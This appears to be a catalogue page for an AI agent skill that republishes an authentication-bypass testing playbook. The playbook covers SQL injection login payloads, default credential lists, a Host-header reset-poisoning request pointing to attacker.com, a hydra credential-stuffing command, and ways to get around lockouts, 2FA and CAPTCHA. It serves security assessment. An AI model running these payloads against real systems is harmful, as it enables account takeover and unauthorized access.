Agent skill

Authbypass Authentication Flaws

by langbyyi in langbyyi/CyberStrikeAI-SRC

Authentication bypass testing playbook. An agent skill from langbyyi/CyberStrikeAI-SRC.

Apache-2.0Auto-check passedBackend & APIs

Install Authbypass Authentication Flaws

skills CLI
$ npx skills add langbyyi/CyberStrikeAI-SRC --skill authbypass-authentication-flaws -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install langbyyi/CyberStrikeAI-SRC authbypass-authentication-flaws --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/langbyyi/CyberStrikeAI-SRC.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/authbypass-authentication-flaws .claude/skills/authbypass-authentication-flaws && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
authbypass-authentication-flaws
GitHub stars
135
Used in
1 other repo
Token cost
~3.9k tokens
SKILL.md length
995 words
Files
1
Skills in repo
13
Repo updated
First seen
Licence
Apache-2.0

At a glance

Authentication bypass testing playbook. An agent skill from langbyyi/CyberStrikeAI-SRC.

  • Works in 12 steps: AUTHORIZED CREDENTIAL TEST PLANNING → SQL INJECTION LOGIN BYPASS → PASSWORD RESET VULNERABILITIES → …
  • Assessing login flows
  • SKILL.md covers 0. AUTHORIZED CREDENTIAL TEST…, 1. SQL INJECTION LOGIN BYPASS, 2. PASSWORD RESET… and 3. ACCOUNT ENUMERATION, plus 3 more sections
  • Needs VICTIM_TOKEN

What it does

Authbypass Authentication Flaws is an agent skill from langbyyi/CyberStrikeAI-SRC. Authentication bypass testing playbook. Use when assessing login flows, password reset logic, account recovery, MFA bypass, token predictability, brute-force resistance, and session boundary flaws.

Its SKILL.md is about 3.9k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Backend & APIs, covering Authentication. It works with MySQL. The licence is Apache-2.0.

When your agent uses it

  • Assessing login flows
  • Password reset logic
  • Account recovery
  • Token predictability

Example prompts

  • “/authbypass-authentication-flaws”

Requirements

  • A credential in VICTIM_TOKEN

Workflow steps

12 steps, taken from the step headings in SKILL.md.

  1. AUTHORIZED CREDENTIAL TEST PLANNING
  2. SQL INJECTION LOGIN BYPASS
  3. PASSWORD RESET VULNERABILITIES
  4. ACCOUNT ENUMERATION
  5. BRUTE FORCE BYPASS
  6. MULTI-FACTOR AUTHENTICATION BYPASS
  7. OAUTH / SSO ACCOUNT TAKEOVER PATTERNS
  8. USERNAME / PASSWORD FIELD MANIPULATION
  9. SESSION MANAGEMENT FLAWS
  10. AUTHENTICATION TESTING CHECKLIST
  11. PASSWORD RESET ATTACK MATRIX (22 Patterns)
  12. CAPTCHA/VERIFICATION BYPASS PATTERNS (20 Methods)

What it can do on your machine

Read from SKILL.md and the folder at commit 166ee1c. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    No scripts in the folder and no shell commands in SKILL.md (its code samples are sql, http, bash and php).

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names these keys or tokens, usually read from environment variables:

    • VICTIM_TOKEN

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Authbypass Authentication Flaws loads about 3.9k tokens when it runs. Until then it costs about 57 tokens; SKILL.md has 995 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~57
When it runs · the whole SKILL.md, loaded when a task matches
~3.9k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from langbyyi/CyberStrikeAI-SRC at commit 166ee1c, republished under its Apache-2.0 licence (© langbyyi). 995 words, ~3,881 tokens.

Download SKILL.mdSave it as .claude/skills/authbypass-authentication-flaws/SKILL.md (or your agent's skills folder).
name
authbypass-authentication-flaws
description
Authentication bypass testing playbook. Use when assessing login flows, password reset logic, account recovery, MFA bypass, token predictability, brute-force resistance, and session boundary flaws.

SKILL: Authentication Bypass — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert authentication bypass techniques. Covers SQL injection-based login bypass, password reset flaws, token predictability, account enumeration, brute force bypass, and multi-factor auth bypass. Distinct from JWT/OAuth (covered in ../jwt-oauth-token-attacks/SKILL.md). Focus on the login mechanism itself.

0. AUTHORIZED CREDENTIAL TEST PLANNING

在减少入口后,默认凭证、用户名变体、端口聚焦和字典规模选择并入这里统一处理。

Service-first tiny sets
Service TypeFirst UsernamesFirst Passwords
phpMyAdminroot, adminempty, root, phpmyadmin, admin
FTPftp, admin, testempty, ftp, admin, 123456
SSHroot, admin, service account namesroot, admin, seasonal variants
MySQLroot, mysqlempty, root, mysql
Tomcat / Java admintomcat, admin, managertomcat, admin, s3cret
WebLogicweblogic, adminweblogic, welcome1, admin
Username classes
ClassExamples
Generic adminsadmin, administrator, root, test, guest
Support / opsdev, ops, sysadmin, service, backup
Name-basedfirstname, lastname, f.lastname, first.last
Mail-derivedleft side of corporate email formats
Product-basedtomcat, weblogic, jenkins, gitlab
Wordlist sizing and port focus
ScenarioPreferred SizeWhy
Default admin panel5 to 50 passwordsDefaults beat giant lists here
Internal service with known productvendor-specific small setBetter signal than generic lists
Consumer login with weak controlsTop 20 or Top 100Fast verification
Rate-limited logintiny list + header/rotation strategyPreserve attempts
Offline hash crackinglarge dictionariesOnline brute rules do not apply

优先端口和服务面:80/443/8080/8443 管理面板,22 SSH,21 FTP,3306/5432/6379/27017 数据或管理服务。


1. SQL INJECTION LOGIN BYPASS

Classic but still found in legacy systems, custom ORMs, and raw query code:

sql
-- Basic bypass (admin user assumed first row):
Username: admin'--
Password: anything
→ Query: SELECT * FROM users WHERE user='admin'--' AND pass='anything'

-- Generic bypass (logs in as first user in DB):
Username: ' OR '1'='1'--
Password: anything
→ Query: SELECT * FROM users WHERE user='' OR '1'='1'--' AND pass='anything'

-- Blind: does this work?
Username: ' OR 1=1--
Username: admin' OR 'a'='a
Username: 1' OR '1'='1'/*
Username: 1 or 1=1

Test each field separately — only one field may be vulnerable.


2. PASSWORD RESET VULNERABILITIES

Guessable / Predictable Reset Tokens

Check if reset token is based on:

- Timestamp: token=1691234567890 (Unix time)
- Sequential: token=1001, 1002, 1003
- MD5(email): echo -n "user@example.com" | md5sum
- MD5(username+timestamp): reversible
- Short token (4-6 digits): brute-forceable

Test: Request 3 consecutive reset emails, compare token patterns.

Reset Token Not Expiring
1. Request password reset → get token via email
2. Wait 48+ hours (token should expire)
3. Use old token → does it work?
Reset Token Reuse
1. Request reset → get token T1
2. Complete reset with T1
3. Use T1 again → does it work again?
Host Header Injection in Reset Email

When application generates reset URL using Host header:

http
POST /forgot-password HTTP/1.1
Host: attacker.com           ← inject attacker's domain
Content-Type: application/x-www-form-urlencoded

email=victim@target.com

→ Reset email sent to victim with link pointing to attacker.com/reset?token=VICTIM_TOKEN → Victim clicks → token captured by attacker

Test: Send password reset with modified Host:, check email for where reset link points.

Password Reset Token in Referer
1. Request reset → go to reset URL with token
2. Reset page loads third-party resources (analytics, fonts)
→ Referer header leaks: https://target.com/reset?token=TOKEN
→ Third-party server receives token in logs
Password Change Without Current Password
PUT /api/user/password
{"new_password": "hacked"}
→ No current_password field required?
→ Combine with CSRF for account takeover

3. ACCOUNT ENUMERATION

Identifying valid usernames/emails enables targeted attacks:

Error Message Difference
Invalid username → "User not found"
Valid username, wrong pass → "Incorrect password"
→ Enumerate valid accounts
Response Time Difference
Invalid username → fast response (no DB lookup)
Valid username → slightly slower (DB lookup + hash comparison)
→ Timing oracle
Password Reset Flow
POST /forgot-password {"email": "nonexistent@example.com"}
→ "If this email exists, we sent a reset link" (proper)
vs.
→ "This email is not registered" (enumeration possible)
Registration Endpoint
POST /register {"email": "victim@example.com"}
→ "Email already registered" → confirms account exists
vs.
→ "Verification email sent" for both → no enumeration

4. BRUTE FORCE BYPASS

Lockout After N Attempts Then Resets
Lockout at 10 attempts → try 9 wrong passwords → lock
Wait for reset period (usually 30 min or 1 hour)
→ Try 9 more → repeat → no permanent lockout
IP-Based Lockout Bypass
X-Forwarded-For: 1.1.1.1       ← change each request
X-Real-IP: 2.2.2.2
Rotate through IPs in header
Username Cycling vs Password Cycling
Normal brute: try many passwords for one user → lock
Reverse brute: try ONE password for many users
→ "password123" against all users → find those with weak password
→ No single account locked out
Credential Stuffing

Use breached credentials from HaveIBeenPwned datasets against target:

bash
# Tools: Hydra, Burp Intruder, custom scripts
hydra -C credentials.txt https-post-form://target.com/login:"username=^USER^&password=^PASS^":"error message"

5. MULTI-FACTOR AUTHENTICATION BYPASS

Flow: Login (password correct) → redirect to 2FA page → enter code
Attack: After password step, session cookie is set but 2FA not yet checked.
→ Use session cookie to directly access /dashboard
→ Skip 2FA page entirely
2FA Code Brute Force
4-6 digit TOTP codes = 1,000,000 possibilities max
If no lockout on 2FA step:
→ Brute force all codes (tool: Burp Intruder, sequential)
→ TOTP windows: 30-second window, some accept previous/next window
2FA on Critical Actions Not On Login
Login doesn't require 2FA, but:
DELETE /account or POST /transfer requires 2FA
Attack: Is 2FA checked on those actions or only on login?
→ If only login: log in once → no 2FA needing verification for actions
2FA Backup Code Abuse
Generate backup codes (usually 8-10 single-use)
Test: 
→ Are backup codes rate-limited?
→ Can backup codes be used multiple times?
→ Short codes (6-8 chars)? Brute-force if no rate limit
2FA Code Reuse
TOTP codes valid for one use
→ Use same TOTP code twice → does second use work?
→ Replay attack if server doesn't track used codes

6. OAUTH / SSO ACCOUNT TAKEOVER PATTERNS

Email Claim Trust
1. Create account at attacker-controlled OAuth provider
2. Set email claim = victim@target.com
3. Link/login via that provider
→ If server trusts email claim without verification → account merge/takeover
1. User links Google SSO
2. User forgets password (account has no password set after SSO only)
3. "Forgot Password" flow → resets password even for SSO-only accounts?  
→ Can set password → now bypass SSO → direct login

7. USERNAME / PASSWORD FIELD MANIPULATION

Long Password DoS → Bypass
Some apps hash passwords before sending to database.
bcrypt has 72-byte limit — input beyond 72 bytes is ignored.
Attack: 
→ Register with password "A"*100
→ Login with password "A"*72 → same hash → works
→ Login with "A"*71 + "totally different" → if truncation → same hash if first 72 chars match
Null Byte in Username
username=admin%00 vs username=admin
→ Null byte truncation in some string comparisons
→ "admin\0attacker" = "admin" in C-string comparison
Unicode Normalization
Username: "ⓢcott" → normalizes to "scott" → impersonates "scott"
Username: "admin" (various Unicode homoglyphs for letters a,d,m,i,n)

8. SESSION MANAGEMENT FLAWS

Session Not Invalidated on Logout
1. Log in → capture session cookie
2. Log out
3. Replay captured session cookie → still valid?
→ Session not server-side invalidated
Session Not Regenerated on Privilege Change
1. Log in as low priv → get session cookie
2. Admin upgrades your role
3. Old session cookie now has admin access?
→ Session not regenerated → old token inherits new privileges
Predictable Session Tokens
Token: base64(userid+timestamp) → reversible
Token: sequential integers → session ID= your_session_id -/+ small number
Token: short random (32-bit entropy) → brute-forceable

9. AUTHENTICATION TESTING CHECKLIST

□ Try SQL injection on login fields (' OR 1=1--)
□ Test password reset: predict token, host header injection, Referer leak
□ Test account enumeration via error messages / timing
□ Check 2FA: skip step (direct URL), brute force codes, reuse codes
□ Test brute force protections: X-Forwarded-For bypass, reverse brute
□ Check session invalidation on logout
□ Check session regeneration after privilege change
□ Test password change requiring current password  
□ Test long passwords (bcrypt 72-byte truncation)
□ OAuth/SSO: test email claim trust, password set after SSO
□ Check remember_me tokens: how long, revocable, predictable?

10. PASSWORD RESET ATTACK MATRIX (22 Patterns)

#PatternDescription
1Predictable reset tokenToken based on timestamp, user ID, or sequential number
2Token not bound to userUse token generated for user A to reset user B
3Token in response bodyReset token returned in HTTP response (not just email)
4Token in URL parameterReset link token visible in Referer header to external resources
5No token expirationToken remains valid indefinitely
6Token reuseSame token works multiple times
7Short/brute-forceable token4-6 digit numeric code without rate limiting
8Password reset via host headerHost: attacker.com → reset link sent with attacker's domain
9Registration overwrites existing accountRegister with same email → overwrites password
10Step skip (frontend only)Jump directly to "set new password" step via URL
11Response manipulationChange {"status":"fail"} to {"status":"success"} in proxy
12Verification code in responseSMS/email code returned in API response
13Parallel session resetStart reset for A, complete with B's session
14Email/phone parameter pollutionemail=victim@x.com&email=attacker@x.com
15Unicode normalizationadmin@target.com vs ADMIN@target.com vs Unicode confusables
16SQL injection in resetEmail field injectable in reset query
17IDOR on reset endpointChange user ID in reset confirmation request
18Cross-protocol resetMobile API doesn't validate same token as web
19Default security questionsGuessable answers, no rate limit
20Token generation race conditionMultiple simultaneous requests generate same token
21Logout doesn't invalidate resetAfter password change, old sessions still work
22Reset link cached by CDN/proxyPublic cache stores reset link with token

Show full SKILL.md (288 more words)Show less

11. CAPTCHA/VERIFICATION BYPASS PATTERNS (20 Methods)

#MethodHow
1Remove captcha parameterDelete captcha field from request
2Send empty captchacaptcha= or captcha=null
3Reuse previous captchaSame captcha value works multiple times
4Captcha not bound to sessionUse captcha solved in session A for session B
5Server-side validation missingCaptcha checked client-side only
6Response manipulationIntercept and change response to bypass
7Change request methodPOST→GET or vice versa may skip captcha check
8JSON content-typeSwitch from form to JSON — captcha handler may not process
9OCR bypass用 ddddocr 工具识别验证码(ocr 文字/detect 点选/slide 滑块),纯数字传 charset=digit 提升准确率,识别后回填 captcha/verifyCode 字段继续爆破或重置
10Audio captcha weaknessAudio often simpler than visual
11SMS code in responseVerification code returned in API response body
12SMS code predictableSequential or time-based codes
13No rate limit on code verificationBrute-force 4-6 digit code
14Code not bound to phone/emailUse code sent to phone A on account B
15Code doesn't expireOld codes remain valid
16Null byte in phone number+1234567890%00 bypasses dedup but delivers to same number
17Case sensitivityEmail: Admin@X.com vs admin@x.com
18Space/encoding in identifieruser@x.com vs user@x.com (trailing space)
19Concurrent requestsRace condition: send verify before captcha loads
20Third-party captcha bypassMisconfigured reCAPTCHA site key allows any domain

12. INSECURE RANDOMNESS — TOKEN PREDICTION

UUID v1 (Time-Based — Predictable!)
UUID v1 format: timestamp-clock_seq-node(MAC)
# MAC address often leaked via other endpoints
# Timestamp is 100ns intervals since 1582-10-15
# Tool: guidtool (reconstruct possible UUIDs from known timestamp range)
MongoDB ObjectId
ObjectId = 4-byte timestamp + 5-byte random + 3-byte counter
# First 4 bytes = Unix timestamp → creation time leaked
# Counter is sequential → adjacent ObjectIds predictable
# If you know one ObjectId, nearby ones are calculable
PHP uniqid()
php
uniqid() = hex(microtime)
// Output: 5f3e7a4c1d2b3
// Entirely based on current microsecond timestamp
// Predictable if you know approximate server time
PHP mt_rand() Recovery
# mt_rand() uses Mersenne Twister PRNG
# After observing ~624 outputs, full internal state is recoverable
# Tool: openwall/php_mt_seed
# Feed known outputs → recover seed → predict all future values
Tools
  • guidtool — UUID v1 reconstruction
  • AethliosIK/reset-tolkien — Automated token prediction for password resets
  • openwall/php_mt_seed — PHP mt_rand seed recovery
  • sandwich — Token timestamp analysis

© langbyyi, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/authbypass-authentication-flaws of langbyyi/CyberStrikeAI-SRC.

Open the folder on GitHubat commit 166ee1c

Used in 1 other repository

We found 1 copy of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in langbyyi/CyberStrikeAI-SRC, which our catalogue first saw on October 7, 2026.

Compare with similar skills

Authbypass Authentication Flaws next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Authbypass Authentication Flaws compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Authbypass Authentication Flaws this skilllangbyyi/CyberStrikeAI-SRC1351 repos~3.9kAutomated safety check: PassApache-2.0
Edgeone Pages Website SkeletonTencentEdgeOne/awesome-website-prompts-and-skills183—~2.2kAutomated safety check: NotesMIT
Fastapi Init Skilljiushiwon/wg-skills114—~1.8kAutomated safety check: NotesApache-2.0
Springboot Init Skilljiushiwon/wg-skills114—~2.2kAutomated safety check: NotesApache-2.0
Fortify Developmentcoollabsio/coolify63k4 repos~1.9kAutomated safety check: PassMIT
Supabase Development and Debuggingsupabase/agent-skills2.7k3 repos~3.6kAutomated safety check: PassMIT

Similar skills

  • Edgeone Pages Website Skeleton

    TencentEdgeOne/awesome-website-prompts-and-skills

    基于 EdgeOne Pages 的全栈网站生成方案。用户说一句话(如「帮我建一个电商站」「做一个AI客服站」「做个管理后台」),AI 自动组合 Auth、Cart、Payment、AI Chat、Admin 五大模块,生成完整 Next.js 前后端代码并部署到 EdgeOne Pages 全球 CDN。支持电商、AI 助手、SaaS 管理后台三大模板。底层使用 Edge…

    183 GitHub stars~2.2k tokensUpdated 4 mo ago
    Backend & APIsAuto-check: notes
  • Fastapi Init Skill

    jiushiwon/wg-skills

    FastAPI 项目一键初始化技能。面向零基础小白,提供环境探测、自动安装、完整 Web 骨架生成、SSE 流式框架、JWT 鉴权、统一响应封装、文件上传接口、一键启动/重启脚本、Swagger 文档,内置 MySQL(默认)/ PostgreSQL / MongoDB 数据库选择。用户只需说"帮我搭一个 FastAPI 项目"即可一条命令完成从零到跑的完整链路。触发词:"FastAPI…

    114 GitHub stars~1.8k tokensUpdated 2 days ago
    Backend & APIsAuto-check: notes
  • Springboot Init Skill

    jiushiwon/wg-skills

    Spring Boot 项目一键初始化技能。面向零基础小白,提供环境探测、自动安装、完整 Web 骨架生成、SSE 流式框架、JWT 鉴权、统一响应封装、文件上传接口、一键启动/重启脚本、Swagger 文档,内置 MySQL(默认)/ PostgreSQL / MongoDB 数据库选择。用户只需说"帮我搭一个 Spring Boot…

    114 GitHub stars~2.2k tokensUpdated 2 days ago
    Backend & APIsAuto-check: notes
  • Fortify Development

    coollabsio/coolify

    ACTIVATE when the user works on authentication in Laravel. An agent skill from coollabsio/coolify.

    63k GitHub starsUsed in 4 repos~1.9k tokens
    Backend & APIsAuto-check passed
  • Official

    General Supabase skill for database, auth, Edge Functions, Realtime and storage work, plus client libraries, migrations, security audits, debugging and reading logs.

    2.7k GitHub starsUsed in 3 repos~3.6k tokens
    Backend & APIsAuto-check passed
  • Better Auth Best Practices

    latitude-dev/latitude-llm

    Configure Better Auth server and client, set up database adapters, manage sessions, add plugins, and handle environment variables.

    4.7k GitHub starsUsed in 7 repos~1.6k tokens
    Backend & APIsAuto-check passed

More from langbyyi/CyberStrikeAI-SRC

All 13 skills in this repo
  • Burp MCP Vuln Check

    langbyyi/CyberStrikeAI-SRC

    Automate low-impact web vulnerability verification through Burp MCP.

    135 GitHub stars~3.1k tokensUpdated 2 days ago
    Auto-check passed
  • HTTP Parameter Pollution

    langbyyi/CyberStrikeAI-SRC

    HTTP Parameter Pollution (HPP): duplicate query/body keys parsed differently by servers, proxies, WAFs, and app frameworks.

    135 GitHub starsUsed in 1 repo~2.2k tokens
    Auto-check passed
  • Insecure Source Code Management

    langbyyi/CyberStrikeAI-SRC

    Source control and artifact exposure (.git, .svn, .hg, backups, .env).

    135 GitHub starsUsed in 1 repo~1.3k tokens
    Auto-check: notes
  • Type Juggling

    langbyyi/CyberStrikeAI-SRC

    PHP type juggling and weak comparison (==) bypass. An agent skill from langbyyi/CyberStrikeAI-SRC.

    135 GitHub starsUsed in 1 repo~2.9k tokens
    Auto-check passed
  • Websocket Security

    langbyyi/CyberStrikeAI-SRC

    WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws.

    135 GitHub starsUsed in 1 repo~1.8k tokens
    Auto-check passed
  • Xslt Injection

    langbyyi/CyberStrikeAI-SRC

    XSLT injection testing: processor fingerprinting, XXE and document() SSRF, EXSLT write primitives, PHP/Java/.NET extension RCE surfaces.

    135 GitHub starsUsed in 1 repo~3k tokens
    Auto-check passed

Works with

Categories

Questions about Authbypass Authentication Flaws

What does Authbypass Authentication Flaws do?

Authentication bypass testing playbook. An agent skill from langbyyi/CyberStrikeAI-SRC. Authbypass Authentication Flaws is an agent skill from langbyyi/CyberStrikeAI-SRC. Authentication bypass testing playbook.

When should I use Authbypass Authentication Flaws?

Authbypass Authentication Flaws fits situations like: assessing login flows; password reset logic; account recovery; token predictability.

How do I install Authbypass Authentication Flaws in Claude Code?

Run `npx skills add langbyyi/CyberStrikeAI-SRC --skill authbypass-authentication-flaws -a claude-code`. Or copy the skill folder (skills/authbypass-authentication-flaws in langbyyi/CyberStrikeAI-SRC) into .claude/skills/authbypass-authentication-flaws in your project. Claude Code loads it when a task matches its description.

How do I install Authbypass Authentication Flaws in Codex?

Run `npx skills add langbyyi/CyberStrikeAI-SRC --skill authbypass-authentication-flaws -a codex`. Or copy the skill folder (skills/authbypass-authentication-flaws in langbyyi/CyberStrikeAI-SRC) into .agents/skills/authbypass-authentication-flaws in your project. Codex loads it when a task matches its description.

Can I use Authbypass Authentication Flaws in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add langbyyi/CyberStrikeAI-SRC --skill authbypass-authentication-flaws -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/authbypass-authentication-flaws, .gemini/skills/authbypass-authentication-flaws, .github/skills/authbypass-authentication-flaws and .opencode/skills/authbypass-authentication-flaws in your project.

What does Authbypass Authentication Flaws need to run?

Going by SKILL.md and its folder, Authbypass Authentication Flaws needs credentials named VICTIM_TOKEN. Our summary lists: A credential in VICTIM_TOKEN.

Does Authbypass Authentication Flaws access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Authbypass Authentication Flaws safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Authbypass Authentication Flaws use?

Authbypass Authentication Flaws is published under the Apache-2.0 licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Authbypass Authentication Flaws use?

About 3.9k tokens (SKILL.md is roughly 16k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Authbypass Authentication Flaws?

Skills that share tags, products or a category with Authbypass Authentication Flaws: Edgeone Pages Website Skeleton (TencentEdgeOne/awesome-website-prompts-and-skills, 183 stars), Fastapi Init Skill (jiushiwon/wg-skills, 114 stars), Springboot Init Skill (jiushiwon/wg-skills, 114 stars) and Fortify Development (coollabsio/coolify, 63k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Authbypass Authentication Flaws?

langbyyi (a GitHub user) maintains it in langbyyi/CyberStrikeAI-SRC, which has 135 GitHub stars. The repository holds 13 skills in this directory. The repository was last updated on October 7, 2026.

Source: langbyyi/CyberStrikeAI-SRC on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.